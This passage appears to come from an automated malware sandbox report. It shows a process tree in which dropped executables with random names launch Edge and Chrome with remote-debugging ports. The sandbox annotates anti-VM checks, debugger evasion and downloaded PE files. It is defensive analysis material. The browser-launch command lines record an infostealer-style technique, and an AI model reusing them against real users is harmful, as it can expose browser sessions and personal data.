                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,10843358919977149264,8411394819877009697,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2112 /prefetch:3
                                                                                                                        10⤵
                                                                                                                          PID:2196
                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                        9⤵
                                                                                                                        • Uses browser remote debugging
                                                                                                                        • Enumerates system info in registry
                                                                                                                        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                        PID:2092
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffccfae46f8,0x7ffccfae4708,0x7ffccfae4718
                                                                                                                          10⤵
                                                                                                                          • Checks processor information in registry
                                                                                                                          • Enumerates system info in registry
                                                                                                                          PID:6604
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,6557601656589202898,10905939247081659252,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
                                                                                                                          10⤵
                                                                                                                            PID:468
                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,6557601656589202898,10905939247081659252,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:3
                                                                                                                            10⤵
                                                                                                                              PID:6096
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2088,6557601656589202898,10905939247081659252,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3064 /prefetch:8
                                                                                                                              10⤵
                                                                                                                                PID:7152
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2088,6557601656589202898,10905939247081659252,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
                                                                                                                                10⤵
                                                                                                                                • Uses browser remote debugging
                                                                                                                                PID:6176
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2088,6557601656589202898,10905939247081659252,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
                                                                                                                                10⤵
                                                                                                                                • Uses browser remote debugging
                                                                                                                                PID:6224
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                                                                                                              9⤵
                                                                                                                              • Uses browser remote debugging
                                                                                                                              • Enumerates system info in registry
                                                                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                              PID:7144
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffccfae46f8,0x7ffccfae4708,0x7ffccfae4718
                                                                                                                                10⤵
                                                                                                                                • Checks processor information in registry
                                                                                                                                • Enumerates system info in registry
                                                                                                                                PID:5704
                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2112 /prefetch:2
                                                                                                                                10⤵
                                                                                                                                  PID:4124
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2164 /prefetch:3
                                                                                                                                  10⤵
                                                                                                                                    PID:1960
                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2856 /prefetch:8
                                                                                                                                    10⤵
                                                                                                                                      PID:2744
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
                                                                                                                                      10⤵
                                                                                                                                      • Uses browser remote debugging
                                                                                                                                      PID:6364
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:1
                                                                                                                                      10⤵
                                                                                                                                      • Uses browser remote debugging
                                                                                                                                      PID:6424
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4820 /prefetch:1
                                                                                                                                      10⤵
                                                                                                                                      • Uses browser remote debugging
                                                                                                                                      PID:6852
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4796 /prefetch:1
                                                                                                                                      10⤵
                                                                                                                                      • Uses browser remote debugging
                                                                                                                                      PID:6900
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
                                                                                                                                      10⤵
                                                                                                                                        PID:5780
                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2104 /prefetch:2
                                                                                                                                        10⤵
                                                                                                                                          PID:2416
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=4732 /prefetch:2
                                                                                                                                          10⤵
                                                                                                                                            PID:4628
                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2436 /prefetch:2
                                                                                                                                            10⤵
                                                                                                                                              PID:6636
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2552 /prefetch:2
                                                                                                                                              10⤵
                                                                                                                                                PID:6224
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=4104 /prefetch:2
                                                                                                                                                10⤵
                                                                                                                                                  PID:6676
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3968 /prefetch:2
                                                                                                                                                  10⤵
                                                                                                                                                    PID:2452
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2100,11997413972325978922,157273849156460439,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3832 /prefetch:2
                                                                                                                                                    10⤵
                                                                                                                                                      PID:544
                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 796
                                                                                                                                                  8⤵
                                                                                                                                                  • Program crash
                                                                                                                                                  PID:1284
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10110250101\FvbuInU.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5556
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10110260101\Ps7WqSx.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5216
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10110270101\nhDLtPT.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:5484
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\10110280101\ILqcVeT.exe"
                                                                                                                                                7⤵
                                                                                                                                                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                                                                                • Downloads MZ/PE file
                                                                                                                                                • Checks BIOS information in registry
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                • Identifies Wine through registry keys
                                                                                                                                                • Loads dropped DLL
                                                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                • Checks processor information in registry
                                                                                                                                                PID:5516
                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                                                                                                                                                  8⤵
                                                                                                                                                  • Uses browser remote debugging
                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                  PID:5972
                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffccb52cc40,0x7ffccb52cc4c,0x7ffccb52cc58
                                                                                                                                                    9⤵
                                                                                                                                                      PID:5016
                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2408,i,11997727860283864032,574051198423989135,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2404 /prefetch:2
                                                                                                                                                      9⤵
                                                                                                                                                        PID:2744
                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1804,i,11997727860283864032,574051198423989135,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2440 /prefetch:3
                                                                                                                                                        9⤵
                                                                                                                                                          PID:1264
                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=1992,i,11997727860283864032,574051198423989135,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2544 /prefetch:8
                                                                                                                                                          9⤵
                                                                                                                                                            PID:2764
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                                                                                                                                                          8⤵
                                                                                                                                                          • Uses browser remote debugging
                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                                          PID:560
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffccfae46f8,0x7ffccfae4708,0x7ffccfae4718
                                                                                                                                                            9⤵
                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                            PID:5848
                                                                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2108 /prefetch:2
                                                                                                                                                            9⤵
                                                                                                                                                              PID:3700
                                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
                                                                                                                                                              9⤵
                                                                                                                                                                PID:4976
                                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2932 /prefetch:8
                                                                                                                                                                9⤵
                                                                                                                                                                  PID:2016
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3344 /prefetch:1
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Uses browser remote debugging
                                                                                                                                                                  PID:3712
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Uses browser remote debugging
                                                                                                                                                                  PID:5816
                                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
                                                                                                                                                                  9⤵
                                                                                                                                                                    PID:6168
                                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4264 /prefetch:2
                                                                                                                                                                    9⤵
                                                                                                                                                                      PID:6392
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                      PID:6436
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9229 --field-trial-handle=2096,2954324359669196329,2941225035934118475,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5020 /prefetch:1
                                                                                                                                                                      9⤵
                                                                                                                                                                      • Uses browser remote debugging
                                                                                                                                                                      PID:6444
                                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
